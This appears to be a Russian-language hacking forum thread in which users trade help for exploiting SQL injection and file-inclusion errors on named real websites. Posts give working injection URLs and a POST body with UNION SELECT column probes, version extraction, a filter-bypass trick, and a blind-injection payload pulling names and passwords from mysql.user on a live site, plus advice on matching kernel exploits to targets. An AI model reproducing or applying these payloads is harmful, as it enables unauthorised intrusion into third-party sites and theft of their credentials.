Если я правильно понял,то там вхождение слова UNION заменяется на "тра та та" попробуй сделать так uniUNIONon ну с регистрами букв можно поэкспериментировать .... по идее должно получится,он вырежет первое вхождение ... а второе должен оставить ... если что сильно меня не бить
это новое ядро - ничего ты не сделаешь если ты сделаешь uname -a то увидишь, что дата ядра позже февраля 2008 а это тухлая дата Компилировать нужно на такой же машине с тем же ядром и желательно с той же конфой в плане проца. А в идеале - все должно быть таким же. Дата эксплоита должна быть раньше даты ядра.
Установил денвер. Его я вижу, http://localhost... Другие вводя мой айпи не видят. ПС, брандмаур вырублен, ип не лан, не меняется. С другими типо xampp видят мну. Помогите !
http://www.metropolis.ru//ru/vacancies-interregional?action=search&total=checkbox&aSpec=4 уязвимый парамет вроде как aSpec... но БД стоит непонятная и вывод тоже....вобщем помогите раскрутить
Возможно раскрутить? Code: Warning: preg_match() [function.preg-match]: Unknown modifier ')' in /home/***/index.php on line 1974
ну кроме раскрытия путей я ничего не вижу, трудно о чем то суди без линка, может просто кривой программер в patern вставил ) что то типа - "#<title>(.*)</title>#i)"
http://www.oldnewrock.ru/index.php?cont=history&pg=2007-onw&prt=rocktour%27 а тут возможно что то сделать? Code: Warning: main(history/2007-onw/inc_rocktour\'.php): failed to open stream: No such file or directory in /www/sapeum/users/sapeum-oldnewroc/www/htdocs/history/2007-onw/index.php on line 36 Warning: main(history/2007-onw/inc_rocktour\'.php): failed to open stream: No such file or directory in /www/sapeum/users/sapeum-oldnewroc/www/htdocs/history/2007-onw/index.php on line 36 Warning: main(): Failed opening 'history/2007-onw/inc_rocktour\'.php' for inclusion (include_path='.:/usr/lib/php:/usr/local/lib/php') in /www/sapeum/users/sapeum-oldnewroc/www/htdocs/history/2007-onw/index.php on line 36 http://www.smsprogroup.ru/static_page.php?sp=dispatches_private%27 Code: Warning: require_once(Templates/rus.dispatches_private\'.php) [function.require-once]: failed to open stream: No such file or directory in /www/smsprogr/www/htdocs/Templates/rus.layout_true.php on line 66 Fatal error: require_once() [function.require]: Failed opening required 'Templates/rus.dispatches_private\'.php' (include_path='.:/usr/lib/php:/usr/local/lib/php') in /www/smsprogr/www/htdocs/Templates/rus.layout_true.php on line 66 http://www.big-home.ru/card.php?id=10'&type=2 даже не пытался
Народ, подскажите что за хеш?? c2lkPTIzNTM2JmdpZD0yODMzMA== Или каким алгоритмом зашифрованно? =========== Вопрос закрыт, это base64... туплю
Code: http://www.4-dsecurity.com/event.detail.php?EID=6+group+by+7 Груп бай говорит 7. Code: http://www.4-dsecurity.com/event.detail.php?EID=6+union+select+1,2,3,4,5,6,7 Юнион почему-то не читает, почему? Только не надо мне о блиндах. Я знаю, что там есть блинд скуля, но почему в юнионе ошибка? Code: http://www.texascitychamber.com/events/detail.php?EID=1+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25 Тут вывода нету. Если минус поставить - пишет Unable to open image. Опять же не надо о блиндах Хочется юнионом вывести, а не посимвольно брутить. ЗЫ: Если нельзья юнионом - так и скажите =)
там юниона нету, т к 3 ветка. Code: http://www.4-dsecurity.com/event.detail.php?EID=6+and+substring(version(),1,1)=3/* тут 4 ветка, вывод нашёл, смотри пм =) Code: http://www.texascitychamber.com/events/detail.php?EID=1+and+substring(version(),1,1)=4/*
В код смотри http://www.texascitychamber.com/events/detail.php?EID=11111+union+select+version(),2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25 4.1.22-standard
Есть иньекция, данные передаются постом _____________________________________________ POST http://www.agilebio.com:80/products_labcal_download.php HTTP/1.0 Accept: */* Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.0; .NET CLR 1.1.4322) Host: www.agilebio.com Content-Length: 84 Cookie: PHPSESSID=aeghec9708or5shhuv04kufu11 Connection: Close Pragma: no-cache user_id='+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16/*user_pass=&Submit=Download%21&action=download _____________________________________________ Подобрал поля, но вывода не вижу, он тут есть? З.Ы. А get тоже работает вроде http://www.agilebio.com/products_labcal_download.php?user_id='+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16/*&user_pass=&Submit=Download%21&action=download Наверное не могу поставить в id ошибочный параметр? Пробовал с лимитом (+LIMIT+1,1/*) то же самое.
Imperou$, гетом тоже можно мор1ров http://www.agilebio.com/products_labcal_download.php?user_id='+and+if(ascii(substring((select+concat_ws(0x2F,name,password)+from+mysql.user+limit+0,1),1,1))>1,1,(select+1+union+select+3))=1/*&user_pass=&Submit=Download&action=download
http://www.ukrlib.com.ua/kratko-zl/printzip.php?id=77{вылазит ошибка}&bookid=5{Тут тоже инъекция но без явной ошибки} ПОмогите правильно оборвать запрос а то вроде все перепробовал (#,{,/*,--,'#,'{,'/*,--,--+,'--+)
Byrger, Code: Warning: file(data/.dat) [function.file]: failed to open stream: No such file or directory in /home/ukrlib/domains/ukrlib.com.ua/public_html/kratko-zl/printzip.php on line 24 ошибка с mysql не связана.
